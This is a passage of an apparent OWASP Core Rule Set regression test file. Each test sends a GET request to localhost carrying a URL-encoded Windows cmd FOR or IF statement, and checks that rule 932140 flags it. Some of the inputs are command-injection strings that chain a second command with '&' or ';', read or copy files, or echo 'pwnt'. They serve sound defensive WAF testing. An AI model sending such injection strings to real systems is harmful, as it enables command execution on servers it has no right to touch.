HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-51 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-52 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-53 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-54 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-55 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-56 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-57 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-58 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-59 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-60 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-61 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-62 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-63 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-64 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-65 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-66 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-67 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-68 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-69 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-70 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-71 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-72 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-73 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-74 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-75 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-76 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-77 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-78 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-79 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-80 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-81 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-82 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-83 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-84 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-85 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-86 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-87 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-88 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-89 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-90 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-91 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-92 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-93 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-94 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-95 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-96 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-97 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-98 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-99 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-100 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-101 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-102 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-103 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-104 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-105 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-106 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-107 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-108 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-109 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-110 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-111 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-112 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-113 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-114 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-115 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 